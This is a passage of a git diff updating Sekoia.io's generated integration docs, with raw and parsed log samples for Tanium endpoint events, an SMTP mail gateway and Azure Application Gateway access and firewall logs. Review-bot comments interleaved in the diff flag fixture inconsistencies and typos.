"port": 53671 + }, + "user": { + "id": "0" + } + } + + ``` + + +=== "tanium_process_start.json" + + ```json + + { + "message": "{\"event\":\"process_start\",\"hostname\":\"1345671024\",\"host\":\"172.16.2.1\",\"fields\":{\"file__md5\":\"8ed54b7dcf043252441bca716b8c461f\",\"tanium_parent_process_id\":\"-6966498655612172786\",\"create_time\":\"2021-07-15T13:47:13.084000+00:00\",\"parent__command_line\":\"pve-firewall\",\"file__full_path\":\"/usr/sbin/ipset\",\"tanium_process_id\":\"-6166594163916654264\",\"pid\":14664,\"login__user_name\":null,\"command_line\":\"ipset 
save\",\"login__user_id\":4294967295,\"parent__file__full_path\":\"/usr/bin/perl\",\"user__name\":\"root\",\"parent_pid\":1550,\"user__group\":\"root\"}}", + "event": { + "category": [ + "process" + ], + "kind": "event", + "type": [ + "start" + ] + }, + "file": { + "directory": "/usr/sbin", + "name": "ipset", + "path": "/usr/sbin/ipset" + }, + "host": { + "hostname": "1345671024", + "ip": [ + "172.16.2.1" + ], + "name": "1345671024" + }, + "observer": { + "name": "1345671024", + "product": "XEM", + "type": "sensor", + "vendor": "Tanium" + }, + "process": { + "command_line": "ipset save", + "executable": "/usr/sbin/ipset", + "hash": { + "md5": "8ed54b7dcf043252441bca716b8c461f" + }, + "parent": { + "command_line": "pve-firewall", + "executable": "/usr/bin/perl", + "name": "perl", + "pid": 1550 + }, + "start": "2021-07-15T13:47:13.084000Z" + }, + "related": { + "hash": [ + "8ed54b7dcf043252441bca716b8c461f" + ], + "hosts": [ + "1345671024" + ], + "ip": [ + "172.16.2.1" + ] + } + } + + ``` + + + + + +### Extracted Fields + +The following table lists the fields that are extracted, normalized under the ECS format, analyzed and indexed by the parser. It should be noted that infered fields are not listed. + +| Name | Type | Description | +| ---- | ---- | ---------------------------| +|`destination.ip` | `ip` | IP address of the destination. | +|`destination.port` | `long` | Port of the destination. | +|`dns.answers` | `object` | Array of DNS answers. | +|`dns.question.name` | `keyword` | The name being queried. | +|`event.action` | `keyword` | The action captured by the event. | +|`event.category` | `keyword` | Event category. The second categorization field in the hierarchy. | +|`event.kind` | `keyword` | The kind of the event. The highest categorization field in the hierarchy. | +|`event.type` | `keyword` | Event type. The third categorization field in the hierarchy. | +|`file.directory` | `keyword` | Directory where the file is located. 
| +|`file.name` | `keyword` | Name of the file including the extension, without the directory. | +|`file.path` | `keyword` | Full path to the file, including the file name. | +|`group.name` | `keyword` | Name of the group. | +|`host.hostname` | `keyword` | Hostname of the host. | +|`host.ip` | `ip` | Host ip addresses. | +|`observer.name` | `keyword` | Custom name of the observer. | +|`observer.product` | `keyword` | The product name of the observer. | +|`observer.type` | `keyword` | The type of the observer the data is coming from. | +|`observer.vendor` | `keyword` | Vendor name of the observer. | +|`process.command_line` | `wildcard` | Full command line that started the process. | +|`process.executable` | `keyword` | Absolute path to the process executable. | +|`process.hash.md5` | `keyword` | MD5 hash. | +|`process.name` | `keyword` | Process name. | +|`process.parent.command_line` | `wildcard` | Full command line that started the process. | +|`process.parent.executable` | `keyword` | Absolute path to the process executable. | +|`process.parent.name` | `keyword` | Process name. | +|`process.parent.pid` | `long` | Process id. | +|`process.pid` | `long` | Process id. | +|`process.start` | `date` | The time the process started. | +|`registry.path` | `keyword` | Full path, including hive, key and value | +|`registry.value` | `keyword` | Name of the value written. | +|`source.ip` | `ip` | IP address of the source. | +|`source.port` | `long` | Port of the source. | +|`user.id` | `keyword` | Unique identifier of the user. | +|`user.name` | `keyword` | Short name or login of the user. | + + For more information on the Intake Format, please find the code of the Parser, Smart Descriptions, and Supported Events [here](https://github.com/SEKOIA-IO/intake-formats/tree/main/Tanium/tanium). \ No newline at end of file 
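Review bot: in the new `### Extracted Fields` paragraph, "infered" should be "inferred". More importantly, the `tanium_process_start.json` sample shows the parser dropping fields that the table claims are extracted: the raw event carries `"pid":14664` and `"user__name":"root"`, yet the transformed `process` object has no `pid` and no `name` (the parent does get `"name": "perl"`, so the basename derivation already exists) and there is no `user` object at all; `tanium_file_open.json` likewise has `process__user__name: root` in the raw message but only `user.id` in the output, never `user.name`. `event.action` is set only for `file_open` (`file-open`), while `network_connect` and `process_start` emit none, and the `dns.*` and `registry.*` rows in the table have no sample at all. Suggest adding the missing `process.pid`, `process.name` and `user.name` mappings (or trimming the table to what is really produced), setting `event.action` for every event type, and including a dns and a registry sample so the `registry` category in the table is backed by an example.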
diff --git a/_shared_content/operations_center/integrations/generated/59991ced-c2a0-4fb0-91f3-49e3993c16f5_sample.md b/_shared_content/operations_center/integrations/generated/59991ced-c2a0-4fb0-91f3-49e3993c16f5_sample.md index e69de29bb2..c2f3608b63 100644 --- a/_shared_content/operations_center/integrations/generated/59991ced-c2a0-4fb0-91f3-49e3993c16f5_sample.md +++ b/_shared_content/operations_center/integrations/generated/59991ced-c2a0-4fb0-91f3-49e3993c16f5_sample.md 
@@ -0,0 +1,85 @@ + +### Raw Events Samples + +In this section, you will find examples of raw logs as generated natively by the source. These examples are provided to help integrators understand the data format before ingestion into Sekoia.io. It is crucial for setting up the correct parsing stages and ensuring that all relevant information is captured. + + +=== "tanium_file_open" + + + ```json + { + "event": "file_open", + "hostname": "2256269043", + "host": "172.16.2.1", + "fields": { + "tanium_process_id": "-6966335309415971179", + "read_flag": true, + "full_path": "/var/lib/rrdcached/db/pve2-vm/115", + "process__login__user_id": 4294967295, + "process__login__user_name": null, + "process__pid": 1685, + "process__user__group": "root", + "process__file__full_path": "/usr/bin/rrdcached", + "process__user__name": "root" + } + } + ``` + + + +=== "tanium_network_connect" + + + ```json + { + "event": "network_connect", + "hostname": "2421864415", + "host": "172.16.2.1", + "fields": { + "remote_port": 80, + "process__login__user_name": null, + "process__pid": 2540, + "process__user__group": "NT AUTHORITY", + "local_ip": "172.16.4.1", + "local_port": 53671, + "process__file__full_path": "C:\\Windows\\System32\\svchost.exe", + "tanium_process_id": "-4314545011392247632", + "process__login__user_id": 0, + "remote_ip": "184.25.50.65", + "process__user__name": "NETWORK SERVICE" + } + } + ``` + + + +=== "tanium_process_start" + + + ```json + { + "event": "process_start", + "hostname": "1345671024", + "host": "172.16.2.1", + "fields": { + "file__md5": "8ed54b7dcf043252441bca716b8c461f", + "tanium_parent_process_id": "-6966498655612172786", + "create_time": "2021-07-15T13:47:13.084000+00:00", + "parent__command_line": "pve-firewall", + "file__full_path": "/usr/sbin/ipset", + "tanium_process_id": "-6166594163916654264", + "pid": 14664, + "login__user_name": null, + "command_line": "ipset save", + "login__user_id": 4294967295, + "parent__file__full_path": "/usr/bin/perl", + 
"user__name": "root", + "parent_pid": 1550, + "user__group": "root" + } + } + ``` + + + diff --git a/_shared_content/operations_center/integrations/generated/5a8ef52f-d143-4735-8546-98539fc07725.md b/_shared_content/operations_center/integrations/generated/5a8ef52f-d143-4735-8546-98539fc07725.md index 5e5ef07d07..3b52e78f77 100644 --- a/_shared_content/operations_center/integrations/generated/5a8ef52f-d143-4735-8546-98539fc07725.md +++ b/_shared_content/operations_center/integrations/generated/5a8ef52f-d143-4735-8546-98539fc07725.md @@ -18,7 +18,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "1.json" diff --git a/_shared_content/operations_center/integrations/generated/5cf6cc3b-50ca-48f5-a3ea-b9be92914fa2.md b/_shared_content/operations_center/integrations/generated/5cf6cc3b-50ca-48f5-a3ea-b9be92914fa2.md index 783e69f709..0d95f50dcd 100644 
--- a/_shared_content/operations_center/integrations/generated/5cf6cc3b-50ca-48f5-a3ea-b9be92914fa2.md +++ b/_shared_content/operations_center/integrations/generated/5cf6cc3b-50ca-48f5-a3ea-b9be92914fa2.md @@ -20,7 +20,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test-umbrella-ip.json" diff --git a/_shared_content/operations_center/integrations/generated/5d9e261a-944c-4a76-8c61-6794fd44d9a8.md b/_shared_content/operations_center/integrations/generated/5d9e261a-944c-4a76-8c61-6794fd44d9a8.md index c75a25bcdd..22eb0b2607 100644 --- a/_shared_content/operations_center/integrations/generated/5d9e261a-944c-4a76-8c61-6794fd44d9a8.md +++ b/_shared_content/operations_center/integrations/generated/5d9e261a-944c-4a76-8c61-6794fd44d9a8.md 
@@ -17,7 +17,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "domain.json" diff --git a/_shared_content/operations_center/integrations/generated/60af2bd6-7ef0-48a7-a6db-90fcdd7236f1.md b/_shared_content/operations_center/integrations/generated/60af2bd6-7ef0-48a7-a6db-90fcdd7236f1.md index 4879d11155..c96f0b006f 100644 --- a/_shared_content/operations_center/integrations/generated/60af2bd6-7ef0-48a7-a6db-90fcdd7236f1.md +++ b/_shared_content/operations_center/integrations/generated/60af2bd6-7ef0-48a7-a6db-90fcdd7236f1.md 
@@ -17,7 +17,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "encrypt.json" 
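Review bot: every file touched by the `/docs/xdr/...` to `/xdr/...` link rewrite lives under `integrations/generated/`, so the same prefix presumably sits in the template these pages are generated from; unless that template changes in the same PR, the next regeneration will reintroduce `/docs/xdr/features/detect/rules_catalog`, `/docs/xdr/features/investigate/events` and `/docs/xdr/features/detect/sigma` in all of these pages. Please confirm the generator template is updated, or point to the commit that did it.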
@@ -143,6 +143,127 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "event_smpt_to_1.json" + + ```json + + { + "message": "time=18:33:35.615 device_id=xcvfg log_id=0003007072 type=event subtype=smtp pri=information user=mail ui=mail action=NONE status=N/A session_id=\"13KGXMHI007058-13KGXMHK007058\" msg=\"to=, delay=00:00:06, xdelay=00:00:06, mailer=esmtp, pri=165917, relay= [188.165.36.237], dsn=2.0.0, stat=Sent (Ok: queued as 4T9pxY2qZtz2XPBPX)\"", + "event": { + "action": "NONE", + "category": "smtp", + "kind": "event", + "message": "to=, delay=00:00:06, xdelay=00:00:06, mailer=esmtp, pri=165917, relay= [188.165.36.237], dsn=2.0.0, stat=Sent (Ok: queued as 4T9pxY2qZtz2XPBPX)", + "reason": "Sent (Ok: queued as 4T9pxY2qZtz2XPBPX)" + }, + "action": { + "outcome_reason": "to=, delay=00:00:06, xdelay=00:00:06, mailer=esmtp, pri=165917, relay= [188.165.36.237], dsn=2.0.0, stat=Sent (Ok: queued as 4T9pxY2qZtz2XPBPX)", + "properties": { + "delay": "00:00:06", + "device_id": "xcvfg", + "dsn_version": "2.0.0", + "log_id": "0003007072", + "mailer": "esmtp", + "priority_level_msg": "165917", + "session_id": "13KGXMHI007058-13KGXMHK007058", + "user_identifier": "mail", + "xdelay": "00:00:06" + } + }, + "destination": { + "address": "188.165.36.237", + "ip": "188.165.36.237" + }, + "email": { + "to": { + "address": [ + "contact@example.com" + ] + } + }, + "log": { + "level": "information" + }, + "related": { + "ip": [ + "188.165.36.237" + ], + "user": [ + "mail" + ] + }, + "user": { + "email": "contact@example.com", + "name": "mail" + } + } + + ``` + + +=== "event_smpt_to_2.json" + + ```json + + { + "message": "time=18:33:35.615 device_id=xcvfg log_id=0003007072 type=event subtype=smtp pri=information user=mail ui=mail action=NONE status=N/A session_id=\"13KGXMHI007058-13KGXMHK007058\" msg=\"to=, delay=00:00:06, xdelay=00:00:06, mailer=esmtp, pri=165917, relay=smtp.example.org [188.165.36.237], dsn=2.0.0, stat=Sent (Ok: queued as 
4T9pxY2qZtz2XPBPX)\"", + "event": { + "action": "NONE", + "category": "smtp", + "kind": "event", + "message": "to=, delay=00:00:06, xdelay=00:00:06, mailer=esmtp, pri=165917, relay=smtp.example.org [188.165.36.237], dsn=2.0.0, stat=Sent (Ok: queued as 4T9pxY2qZtz2XPBPX)", + "reason": "Sent (Ok: queued as 4T9pxY2qZtz2XPBPX)" + }, + "action": { + "outcome_reason": "to=, delay=00:00:06, xdelay=00:00:06, mailer=esmtp, pri=165917, relay=smtp.example.org [188.165.36.237], dsn=2.0.0, stat=Sent (Ok: queued as 4T9pxY2qZtz2XPBPX)", + "properties": { + "delay": "00:00:06", + "device_id": "xcvfg", + "dsn_version": "2.0.0", + "log_id": "0003007072", + "mailer": "esmtp", + "priority_level_msg": "165917", + "session_id": "13KGXMHI007058-13KGXMHK007058", + "user_identifier": "mail", + "xdelay": "00:00:06" + } + }, + "destination": { + "address": "smtp.example.org", + "domain": "smtp.example.org", + "ip": "188.165.36.237", + "size_in_char": 16 + }, + "email": { + "to": { + "address": [ + "contact@example.com" + ] + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "smtp.example.org" + ], + "ip": [ + "188.165.36.237" + ], + "user": [ + "mail" + ] + }, + "user": { + "email": "contact@example.com", + "name": "mail" + } + } + + ``` + + === "event_smtp_STARTTLS.json" ```json @@ -224,6 +345,13 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "ip": "1.1.1.1", "size_in_char": 9 }, + "email": { + "to": { + "address": [ + "mh.fr" + ] + } + }, "host": { "name": "1234" }, @@ -243,7 +371,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ] }, "user": { - "email": "", + "email": "mh.fr", "name": "mail" } } @@ -284,6 +412,13 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "ip": "1.1.1.1", "size_in_char": 8 }, + "email": { + "to": { + "address": [ + "sjira.eu" + ] + } + }, "host": { "name": "1234" }, 
@@ -303,7 +438,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ] }, "user": { - "email": "", + "email": "sjira.eu", "name": "mail" } } @@ -366,10 +501,17 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "level": "information" }, "related": { + "ip": [ + "1.2.3.4" + ], "user": [ "j.doe" ] }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, "user": { "name": "j.doe" } @@ -551,6 +693,13 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "user_identifier": "mail" } }, + "email": { + "to": { + "address": [ + "postmaster" + ] + } + }, "host": { "name": "00000" }, diff --git a/_shared_content/operations_center/integrations/generated/60af2bd6-7ef0-48a7-a6db-90fcdd7236f1_sample.md b/_shared_content/operations_center/integrations/generated/60af2bd6-7ef0-48a7-a6db-90fcdd7236f1_sample.md index c1e3b8a561..6acc839904 100644 --- a/_shared_content/operations_center/integrations/generated/60af2bd6-7ef0-48a7-a6db-90fcdd7236f1_sample.md +++ b/_shared_content/operations_center/integrations/generated/60af2bd6-7ef0-48a7-a6db-90fcdd7236f1_sample.md 
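Review bot: the new tabs are named `event_smpt_to_1.json` and `event_smpt_to_2.json` ("smpt" for "smtp"), unlike the neighbouring `event_smtp_STARTTLS.json`; the same misspelling is used for the tab names in the `_sample.md` file further down, so rename both places. In those two samples the raw `msg` reads `to=, delay=00:00:06, ...` with no recipient, while the transformed event sets `email.to.address` and `user.email` to `contact@example.com`; either an angle-bracketed address was stripped when the fixture was written or the parser is producing a value that is not in the input, so please check the fixture before merging. In the later hunks `email.to.address` and `user.email` receive `mh.fr`, `sjira.eu` and `postmaster`, which are a domain or a bare local part rather than addresses; consider populating `email.to.address` and `user.email` only when the recipient contains an `@`, and otherwise leaving the raw value in `action.properties`.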
@@ -28,6 +28,22 @@ In this section, you will find examples of raw logs as generated natively by the +=== "event_smpt_to_1" + + ``` + time=18:33:35.615 device_id=xcvfg log_id=0003007072 type=event subtype=smtp pri=information user=mail ui=mail action=NONE status=N/A session_id="13KGXMHI007058-13KGXMHK007058" msg="to=, delay=00:00:06, xdelay=00:00:06, mailer=esmtp, pri=165917, relay= [188.165.36.237], dsn=2.0.0, stat=Sent (Ok: queued as 4T9pxY2qZtz2XPBPX)" + ``` + + + +=== "event_smpt_to_2" + + ``` + time=18:33:35.615 device_id=xcvfg log_id=0003007072 type=event subtype=smtp pri=information user=mail ui=mail action=NONE status=N/A session_id="13KGXMHI007058-13KGXMHK007058" msg="to=, delay=00:00:06, xdelay=00:00:06, mailer=esmtp, pri=165917, relay=smtp.example.org [188.165.36.237], dsn=2.0.0, stat=Sent (Ok: queued as 4T9pxY2qZtz2XPBPX)" + ``` + + + === "event_smtp_STARTTLS" ``` diff --git a/_shared_content/operations_center/integrations/generated/622999fe-d383-4d41-9f2d-eed5013fe463.md b/_shared_content/operations_center/integrations/generated/622999fe-d383-4d41-9f2d-eed5013fe463.md index a9cc69dfff..c703ec1d49 100644 --- a/_shared_content/operations_center/integrations/generated/622999fe-d383-4d41-9f2d-eed5013fe463.md +++ b/_shared_content/operations_center/integrations/generated/622999fe-d383-4d41-9f2d-eed5013fe463.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_event.json" diff --git a/_shared_content/operations_center/integrations/generated/63974ce1-2f0a-44f7-a4cf-3e64787c1c39.md b/_shared_content/operations_center/integrations/generated/63974ce1-2f0a-44f7-a4cf-3e64787c1c39.md index 0a8756e074..9999c6beda 100644 --- a/_shared_content/operations_center/integrations/generated/63974ce1-2f0a-44f7-a4cf-3e64787c1c39.md +++ b/_shared_content/operations_center/integrations/generated/63974ce1-2f0a-44f7-a4cf-3e64787c1c39.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "sample.json" diff --git a/_shared_content/operations_center/integrations/generated/6967b0ca-f27e-480a-b124-fa4ab0b9d889.md b/_shared_content/operations_center/integrations/generated/6967b0ca-f27e-480a-b124-fa4ab0b9d889.md new file mode 100644 index 0000000000..9702d2d7c6 --- /dev/null +++ b/_shared_content/operations_center/integrations/generated/6967b0ca-f27e-480a-b124-fa4ab0b9d889.md 
@@ -0,0 +1,274 @@ + +### Event Categories + + +The following table lists the data source offered by this integration. + +| Data Source | Description | +| ----------- | ------------------------------------ | +| `Web application firewall logs` | Azure Application Gateway protect web application with its web application firewall | +| `Web logs` | Web logs coming from Azure Application Gateway | + + + + + +In details, the following table denotes the type of events produced by this integration. + +| Name | Values | +| ---- | ------ | +| Kind | `` | +| Category | `network` | +| Type | `access`, `connection` | + + + + +### Transformed Events Samples after Ingestion + +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. 
+ +=== "test_accesslog_1.json" + + ```json + + { + "message": "{\n\t\"resourceId\": \"/SUBSCRIPTIONS//RESOURCEGROUPS//PROVIDERS/MICROSOFT.NETWORK/APPLICATIONGATEWAYS/\",\n\t\"operationName\": \"ApplicationGatewayAccess\",\n\t\"time\": \"2016-04-11T04:24:37Z\",\n\t\"category\": \"ApplicationGatewayAccessLog\",\n\t\"properties\": {\n\t\t\"instanceId\":\"ApplicationGatewayRole_IN_0\",\n\t\t\"clientIP\":\"37.186.113.170\",\n\t\t\"clientPort\":\"12345\",\n\t\t\"httpMethod\":\"HEAD\",\n\t\t\"requestUri\":\"/xyz/portal\",\n\t\t\"requestQuery\":\"\",\n\t\t\"userAgent\":\"-\",\n\t\t\"httpStatus\":\"200\",\n\t\t\"httpVersion\":\"HTTP/1.0\",\n\t\t\"receivedBytes\":\"27\",\n\t\t\"sentBytes\":\"202\",\n\t\t\"timeTaken\":\"359\",\n\t\t\"sslEnabled\":\"off\"\n\t}\n}", + "event": { + "category": [ + "network" + ], + "dataset": "ApplicationGatewayAccess", + "type": [ + "access", + "connection" + ] + }, + "cloud": { + "instance": { + "id": "ApplicationGatewayRole_IN_0" + }, + "provider": "Azure", + "service": { + "name": "Azure Application Gateway" + } + }, + "destination": { + "bytes": 202 + }, + "http": { + "request": { + "method": "HEAD" + }, + "response": { + "status_code": 200 + } + }, + "network": { + "bytes": 27202 + }, + "related": { + "ip": [ + "37.186.113.170" + ] + }, + "source": { + "address": "37.186.113.170", + "bytes": 27, + "ip": "37.186.113.170", + "port": 12345 + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Other", + "original": "-", + "os": { + "name": "Other" + } + } + } + + ``` + + +=== "test_accesslog_2.json" + + ```json + + { + "message": "{\n \"timeStamp\": \"2021-10-14T22:17:11+00:00\",\n \"resourceId\": \"/SUBSCRIPTIONS/{subscriptionId}/RESOURCEGROUPS/{resourceGroupName}/PROVIDERS/MICROSOFT.NETWORK/APPLICATIONGATEWAYS/{applicationGatewayName}\",\n \"listenerName\": \"HTTP-Listener\",\n \"ruleName\": \"Storage-Static-Rule\",\n \"backendPoolName\": \"StaticStorageAccount\",\n \"backendSettingName\": \"StorageStatic-HTTPS-Setting\",\n 
\"operationName\": \"ApplicationGatewayAccess\",\n \"category\": \"ApplicationGatewayAccessLog\",\n \"properties\": {\n \"instanceId\": \"appgw_2\",\n \"clientIP\": \"185.42.129.24\",\n \"clientPort\": 45057,\n \"httpMethod\": \"GET\",\n \"originalRequestUriWithArgs\": \"\\/\",\n \"requestUri\": \"\\/\",\n \"requestQuery\": \"\",\n \"userAgent\": \"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2743.116 Safari\\/537.36\",\n \"httpStatus\": 200,\n \"httpVersion\": \"HTTP\\/1.1\",\n \"receivedBytes\": 184,\n \"sentBytes\": 466,\n \"clientResponseTime\": 0,\n \"timeTaken\": 0.034,\n \"WAFEvaluationTime\": \"0.000\",\n \"WAFMode\": \"Detection\",\n \"transactionId\": \"592d1649f75a8d480a3c4dc6a975309d\",\n \"sslEnabled\": \"on\",\n \"sslCipher\": \"ECDHE-RSA-AES256-GCM-SHA384\",\n \"sslProtocol\": \"TLSv1.2\",\n \"sslClientVerify\": \"NONE\",\n \"sslClientCertificateFingerprint\": \"\",\n \"sslClientCertificateIssuerName\": \"\",\n \"serverRouted\": \"52.239.221.65:443\",\n \"serverStatus\": \"200\",\n \"serverResponseLatency\": \"0.028\",\n \"upstreamSourcePort\": \"21564\",\n \"originalHost\": \"20.110.30.194\",\n \"host\": \"20.110.30.194\",\n \"error_info\":\"ERRORINFO_NO_ERROR\",\n \"contentType\":\"application/json\"\n }\n}", + "event": { + "category": [ + "network" + ], + "dataset": "ApplicationGatewayAccess", + "type": [ + "access", + "connection" + ] + }, + "@timestamp": "2021-10-14T22:17:11Z", + "azure": { + "application_gateway": { + "error_info": "ERRORINFO_NO_ERROR", + "serverStatus": "200", + "sslClientVerify": "NONE", + "transactionId": "592d1649f75a8d480a3c4dc6a975309d" + } + }, + "cloud": { + "instance": { + "id": "appgw_2" + }, + "provider": "Azure", + "service": { + "name": "Azure Application Gateway" + } + }, + "destination": { + "bytes": 466 + }, + "http": { + "request": { + "method": "GET" + }, + "response": { + "status_code": 200 + } + }, + "network": { + "bytes": 650 + }, + "related": { + "ip": [ + 
"185.42.129.24" + ] + }, + "source": { + "address": "185.42.129.24", + "bytes": 184, + "ip": "185.42.129.24", + "port": 45057 + }, + "url": { + "original": "/", + "path": "/" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Chrome", + "original": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36", + "os": { + "name": "Windows", + "version": "7" + }, + "version": "52.0.2743" + } + } + + ``` + + +=== "test_fwlog_1.json" + + ```json + + { + "message": "{\n \"timeStamp\": \"2021-10-14T22:17:11+00:00\",\n \"resourceId\": \"/SUBSCRIPTIONS/{subscriptionId}/RESOURCEGROUPS/{resourceGroupName}/PROVIDERS/MICROSOFT.NETWORK/APPLICATIONGATEWAYS/{applicationGatewayName}\",\n \"operationName\": \"ApplicationGatewayFirewall\",\n \"category\": \"ApplicationGatewayFirewallLog\",\n \"properties\": {\n \"instanceId\": \"appgw_2\",\n \"clientIp\": \"185.42.129.24\",\n \"clientPort\": \"\",\n \"requestUri\": \"\\/\",\n \"ruleSetType\": \"OWASP_CRS\",\n \"ruleSetVersion\": \"3.0.0\",\n \"ruleId\": \"920350\",\n \"message\": \"Host header is a numeric IP address\",\n \"action\": \"Matched\",\n \"site\": \"Global\",\n \"details\": {\n \"message\": \"Warning. Pattern match \\\\\\\"^[\\\\\\\\d.:]+$\\\\\\\" at REQUEST_HEADERS:Host .... \",\n \"data\": \"20.110.30.194:80\",\n \"file\": \"rules\\/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\",\n \"line\": \"791\"\n },\n \"hostname\": \"20.110.30.194:80\",\n \"transactionId\": \"592d1649f75a8d480a3c4dc6a975309d\",\n \"policyId\": \"default\",\n \"policyScope\": \"Global\",\n \"policyScopeName\": \"Global\"\n }\n}", + "event": { + "action": "Matched", + "category": [ + "network" + ], + "dataset": "ApplicationGatewayFirewall", + "reason": "Host header is a numeric IP address", + "type": [ + "access", + "connection" + ] + }, + "@timestamp": "2021-10-14T22:17:11Z", + "azure": { + "application_gateway": { + "details": { + "message": "Warning. 
Pattern match \\\"^[\\\\d.:]+$\\\" at REQUEST_HEADERS:Host .... " + }, + "message": "Host header is a numeric IP address", + "transactionId": "592d1649f75a8d480a3c4dc6a975309d" + } + }, + "cloud": { + "instance": { + "id": "appgw_2" + }, + "provider": "Azure", + "service": { + "name": "Azure Application Gateway" + } + }, + "destination": { + "address": "20.110.30.194", + "ip": "20.110.30.194", + "port": 80 + }, + "network": { + "bytes": 0 + }, + "related": { + "ip": [ + "185.42.129.24", + "20.110.30.194" + ] + }, + "source": { + "address": "185.42.129.24", + "ip": "185.42.129.24" + } + } + + ``` + + + + + +### Extracted Fields + +The following table lists the fields that are extracted, normalized under the ECS format, analyzed and indexed by the parser. It should be noted that infered fields are not listed. + +| Name | Type | Description | +| ---- | ---- | ---------------------------| +|`@timestamp` | `date` | Date/time when the event originated. | +|`azure.application_gateway.details.message` | `keyword` | The details message. | +|`azure.application_gateway.error_info` | `keyword` | The error information. | +|`azure.application_gateway.message` | `keyword` | The application gateway message. | +|`azure.application_gateway.serverStatus` | `keyword` | The status of the server. | 